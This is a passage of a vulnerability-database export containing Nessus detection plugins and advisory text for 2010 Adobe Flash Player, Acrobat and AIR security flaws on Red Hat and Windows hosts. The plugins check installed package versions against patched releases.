An attacker could use these flaws to create a\nspecially crafted SWF file that would cause flash-plugin to crash or,\npotentially, execute arbitrary code when the victim loaded a page\ncontaining the specially crafted SWF content. (CVE-2010-3639,\nCVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643,\nCVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647,\nCVE-2010-3648, CVE-2010-3649, CVE-2010-3650, CVE-2010-3652,\nCVE-2010-3654)\n\nAn input validation flaw was discovered in flash-plugin. Certain\nserver encodings could lead to a bypass of cross-domain policy file\nrestrictions, possibly leading to cross-domain information disclosure.\n(CVE-2010-3636)\n\nDuring testing, it was discovered that there were regressions with\nFlash Player on certain sites, such as fullscreen playback on YouTube.\nDespite these regressions, we feel these security flaws are serious\nenough to update the package with what Adobe has provided.\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 10.1.102.64.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3636\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3639\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3640\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3641\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3642\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3643\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3644\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://access.redhat.com/security/cve/cve-2010-3645\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3646\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3647\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3648\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3649\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3650\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3652\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3654\"\n );\n # http://www.adobe.com/support/security/bulletins/apsb10-26.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.adobe.com/support/security/bulletins/apsb10-26.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2010:0829\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-plugin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player \"Button\" Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n 
script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:flash-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/10/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2010:0829\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"flash-plugin-10.1.102.64-1.el5\")) flag++;\n\n if (flag)\n {\n flash_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check only applies to RedHat released\\n' +\n 'versions of the flash-plugin package. 
This check does not apply to\\n' +\n 'Adobe released versions of the flash-plugin package, which are\\n' +\n 'versioned similarly and cause collisions in detection.\\n\\n' +\n\n 'If you are certain you are running the Adobe released package of\\n' +\n 'flash-plugin and are running a version of it equal or higher to the\\n' +\n 'RedHat version listed above then you can consider this a false\\n' +\n 'positive.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat() + flash_plugin_caveat\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-plugin\");\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:08:31", "description": "An updated Adobe Flash Player package that fixes multiple security\nissues is now available for Red Hat Enterprise Linux 6 Supplementary.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities are detailed on the Adobe security page\nAPSB10-26, listed in the References section.\n\nMultiple security flaws were found in the way flash-plugin displayed\ncertain SWF content. An attacker could use these flaws to create a\nspecially crafted SWF file that would cause flash-plugin to crash or,\npotentially, execute arbitrary code when the victim loaded a page\ncontaining the specially crafted SWF content. 
(CVE-2010-3639,\nCVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643,\nCVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647,\nCVE-2010-3648, CVE-2010-3649, CVE-2010-3650, CVE-2010-3652,\nCVE-2010-3654)\n\nAn input validation flaw was discovered in flash-plugin. Certain\nserver encodings could lead to a bypass of cross-domain policy file\nrestrictions, possibly leading to cross-domain information disclosure.\n(CVE-2010-3636)\n\nDuring testing, it was discovered that there were regressions with\nFlash Player on certain sites, such as fullscreen playback on YouTube.\nDespite these regressions, we feel these security flaws are serious\nenough to update the package with what Adobe has provided.\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 10.1.102.64.", "edition": 26, "published": "2010-11-18T00:00:00", "title": "RHEL 6 : flash-plugin (RHSA-2010:0867)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3648", "CVE-2010-3640", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3654", "CVE-2010-3645", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3650", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "modified": "2010-11-18T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:flash-plugin", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.0"], "id": "REDHAT-RHSA-2010-0867.NASL", "href": "https://www.tenable.com/plugins/nessus/50639", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0867. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50639);\n script_version(\"1.26\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-3636\", \"CVE-2010-3639\", \"CVE-2010-3640\", \"CVE-2010-3641\", \"CVE-2010-3642\", \"CVE-2010-3643\", \"CVE-2010-3644\", \"CVE-2010-3645\", \"CVE-2010-3646\", \"CVE-2010-3647\", \"CVE-2010-3648\", \"CVE-2010-3649\", \"CVE-2010-3650\", \"CVE-2010-3652\", \"CVE-2010-3654\");\n script_xref(name:\"RHSA\", value:\"2010:0867\");\n\n script_name(english:\"RHEL 6 : flash-plugin (RHSA-2010:0867)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated Adobe Flash Player package that fixes multiple security\nissues is now available for Red Hat Enterprise Linux 6 Supplementary.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities are detailed on the Adobe security page\nAPSB10-26, listed in the References section.\n\nMultiple security flaws were found in the way flash-plugin displayed\ncertain SWF content. An attacker could use these flaws to create a\nspecially crafted SWF file that would cause flash-plugin to crash or,\npotentially, execute arbitrary code when the victim loaded a page\ncontaining the specially crafted SWF content. 
(CVE-2010-3639,\nCVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643,\nCVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647,\nCVE-2010-3648, CVE-2010-3649, CVE-2010-3650, CVE-2010-3652,\nCVE-2010-3654)\n\nAn input validation flaw was discovered in flash-plugin. Certain\nserver encodings could lead to a bypass of cross-domain policy file\nrestrictions, possibly leading to cross-domain information disclosure.\n(CVE-2010-3636)\n\nDuring testing, it was discovered that there were regressions with\nFlash Player on certain sites, such as fullscreen playback on YouTube.\nDespite these regressions, we feel these security flaws are serious\nenough to update the package with what Adobe has provided.\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 10.1.102.64.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3636\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3639\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3640\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3641\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3642\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3643\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3644\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3645\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3646\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://access.redhat.com/security/cve/cve-2010-3647\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3648\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3649\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3650\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3652\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3654\"\n );\n # http://www.adobe.com/support/security/bulletins/apsb10-26.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.adobe.com/support/security/bulletins/apsb10-26.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2010:0867\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-plugin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player \"Button\" Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:flash-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/10/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2010:0867\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", reference:\"flash-plugin-10.1.102.64-1.el6\")) flag++;\n\n\n if (flag)\n {\n flash_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check only applies to RedHat released\\n' +\n 'versions of the flash-plugin package. 
This check does not apply to\\n' +\n 'Adobe released versions of the flash-plugin package, which are\\n' +\n 'versioned similarly and cause collisions in detection.\\n\\n' +\n\n 'If you are certain you are running the Adobe released package of\\n' +\n 'flash-plugin and are running a version of it equal or higher to the\\n' +\n 'RedHat version listed above then you can consider this a false\\n' +\n 'positive.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat() + flash_plugin_caveat\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-plugin\");\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T01:13:03", "description": "The version of Adobe Acrobat 9.x installed on the remote host is\nearlier than 9.4.1. Such versions are reportedly affected by multiple\nvulnerabilities :\n\n - A memory corruption vulnerability exists that could lead \n to code execution. Note that this issue does not affect\n Adobe Acrobat 8.x. (CVE-2010-3654)\n\n - An input validation issue exists that could lead to a\n bypass of cross-domain policy file restrictions with\n certain server encodings. (CVE-2010-3636)\n\n - A memory corruption vulnerability exists in the ActiveX\n component. (CVE-2010-3637)\n\n - An unspecified issue exists which could lead to a \n denial of service or potentially arbitrary code \n execution. (CVE-2010-3639)\n\n - Multiple memory corruption issues exist that could lead\n to arbitrary code execution. (CVE-2010-3640, \n CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, \n CVE-2010-3644, CVE-2010-3645, CVE-2010-3646,\n CVE-2010-3647, CVE-2010-3648, CVE-2010-3649,\n CVE-2010-3650, CVE-2010-3652)\n \n - A library-loading vulnerability could lead to code \n execution. 
(CVE-2010-3976)", "edition": 25, "published": "2010-11-16T00:00:00", "title": "Adobe Acrobat 9.x < 9.4.1 Multiple Vulnerabilities (APSB10-28)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3648", "CVE-2010-3640", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3654", "CVE-2010-3637", "CVE-2010-3645", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3976", "CVE-2010-3650", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:adobe:acrobat"], "id": "ADOBE_ACROBAT_APSB10-28.NASL", "href": "https://www.tenable.com/plugins/nessus/50613", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50613);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2018/09/17 21:46:53\");\n\n script_xref(name:\"Secunia\", value:\"42030\");\n\n script_name(english:\"Adobe Acrobat 9.x < 9.4.1 Multiple Vulnerabilities (APSB10-28)\");\n script_summary(english:\"Checks version of Adobe Acrobat\");\n\n script_cve_id(\"CVE-2010-3636\", \"CVE-2010-3637\", \"CVE-2010-3639\", \"CVE-2010-3640\",\n \"CVE-2010-3641\", \"CVE-2010-3642\", \"CVE-2010-3643\", \"CVE-2010-3644\", \n \"CVE-2010-3645\", \"CVE-2010-3646\", \"CVE-2010-3647\", \"CVE-2010-3648\",\n \"CVE-2010-3649\", \"CVE-2010-3650\", \"CVE-2010-3652\", \"CVE-2010-3654\", \n \"CVE-2010-3976\");\n script_bugtraq_id(44504,44838);\n\n script_set_attribute(attribute:\"synopsis\",value:\n\"The version of Adobe Acrobat on the remote Windows host is affected\nby multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\",value:\n\"The version of Adobe Acrobat 9.x installed on the remote host is\nearlier than 9.4.1. Such versions are reportedly affected by multiple\nvulnerabilities :\n\n - A memory corruption vulnerability exists that could lead \n to code execution. Note that this issue does not affect\n Adobe Acrobat 8.x. 
(CVE-2010-3654)\n\n - An input validation issue exists that could lead to a\n bypass of cross-domain policy file restrictions with\n certain server encodings. (CVE-2010-3636)\n\n - A memory corruption vulnerability exists in the ActiveX\n component. (CVE-2010-3637)\n\n - An unspecified issue exists which could lead to a \n denial of service or potentially arbitrary code \n execution. (CVE-2010-3639)\n\n - Multiple memory corruption issues exist that could lead\n to arbitrary code execution. (CVE-2010-3640, \n CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, \n CVE-2010-3644, CVE-2010-3645, CVE-2010-3646,\n CVE-2010-3647, CVE-2010-3648, CVE-2010-3649,\n CVE-2010-3650, CVE-2010-3652)\n \n - A library-loading vulnerability could lead to code \n execution. (CVE-2010-3976)\");\n\n script_set_attribute(attribute:\"see_also\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-28.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Adobe Acrobat 9.4.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player \"Button\" Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/10/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/16\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/16\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:'Windows');\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n script_dependencies('adobe_acrobat_installed.nasl');\n script_require_keys('SMB/Acrobat/Version');\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"SMB/Acrobat/Version\");\nversion_ui = get_kb_item('SMB/Acrobat/Version_UI');\n\nif (isnull(version_ui)) version_report = version;\nelse version_report = version_ui;\n\nver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\nif ( \n (ver[0] == 9 && ver[1] < 4) ||\n (ver[0] == 9 && ver[1] == 4 && ver[2] < 1)\n)\n{\n if (report_verbosity > 0)\n {\n path = get_kb_item('SMB/Acrobat/Path');\n if (isnull(path)) path = 'n/a';\n\n report =\n '\\n Path : '+path+\n '\\n Installed version : '+version_report+\n '\\n Fixed version : 9.4.1\\n';\n security_hole(port:get_kb_item('SMB/transport'), extra:report);\n }\n else security_hole(get_kb_item('SMB/transport'));\n}\nelse exit(0, \"The host is not affected since Adobe Acrobat \"+version_report+\" is installed.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T01:13:55", "description": "The remote Windows host contains a version of Adobe AIR that is\nearlier than 2.5.1. Such versions are affected by multiple\nvulnerabilities:\n\n - An error exists in the validation of input and, with\n certain server encodings, can lead to a violation of cross-\n domain policy file restrictions. (CVE-2010-3636)\n\n - An unspecified error exists which can lead to a denial\n of service. 
(CVE-2010-3639)\n\n - An error exists in the library loading logic and can \n lead to arbitrary code execution. (CVE-2010-3976)\n\n - There exist multiple memory corruption vulnerabilities \n which can lead to arbitrary code execution.\n (CVE-2010-3637, CVE-2010-3640, CVE-2010-3641, \n CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, \n CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, \n CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, \n CVE-2010-3652, CVE-2010-3654)", "edition": 24, "published": "2010-11-15T00:00:00", "title": "Adobe AIR < 2.5.1 Multiple Vulnerabilities (APSB10-26)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3648", "CVE-2010-3640", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3654", "CVE-2010-3637", "CVE-2010-3645", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3976", "CVE-2010-3650", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:adobe:air"], "id": "ADOBE_AIR_APSB10-26.NASL", "href": "https://www.tenable.com/plugins/nessus/50604", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(50604);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/06/27 18:42:26\");\n\n script_cve_id(\n \"CVE-2010-3636\",\n \"CVE-2010-3637\",\n \"CVE-2010-3639\",\n \"CVE-2010-3640\",\n \"CVE-2010-3641\",\n \"CVE-2010-3642\",\n \"CVE-2010-3643\",\n \"CVE-2010-3644\",\n \"CVE-2010-3645\",\n \"CVE-2010-3646\",\n \"CVE-2010-3647\",\n \"CVE-2010-3648\",\n \"CVE-2010-3649\",\n \"CVE-2010-3650\",\n \"CVE-2010-3652\",\n \"CVE-2010-3654\",\n \"CVE-2010-3976\"\n );\n script_bugtraq_id(\n 44504,\n 44671,\n 44675,\n 44677,\n 44678,\n 44679,\n 44680,\n 44681,\n 44682,\n 44683,\n 44684,\n 44685,\n 44686,\n 44687,\n 44690,\n 44691,\n 44692\n );\n script_xref(name:\"CERT\", value:\"298081\");\n script_xref(name:\"Secunia\", value:\"41917\");\n\n script_name(english:\"Adobe AIR < 2.5.1 
Multiple Vulnerabilities (APSB10-26)\");\n script_summary(english:\"Checks version of Adobe AIR\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Windows host contains a version of Adobe AIR that is\naffected by multiple vulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote Windows host contains a version of Adobe AIR that is\nearlier than 2.5.1. Such versions are affected by multiple\nvulnerabilities:\n\n - An error exists in the validation of input and, with\n certain server encodings, lead to a violation of cross-\n domain policy file restrictions. (CVE-2010-3636)\n\n - An unspecified error exists which can lead to a denial\n of service. (CVE-2010-3639)\n\n - An error exists in the library loading logic and can \n lead to arbitrary code execution. (CVE-2010-3976)\n\n - There exist multiple memory corruption vulnerabilities \n which can lead to arbitrary code execution.\n (CVE-2010-3637, CVE-2010-3640, CVE-2010-3641, \n CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, \n CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, \n CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, \n CVE-2010-3652, CVE-2010-3654)\");\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.adobe.com/support/security/bulletins/apsb10-26.html\"\n );\n script_set_attribute(\n 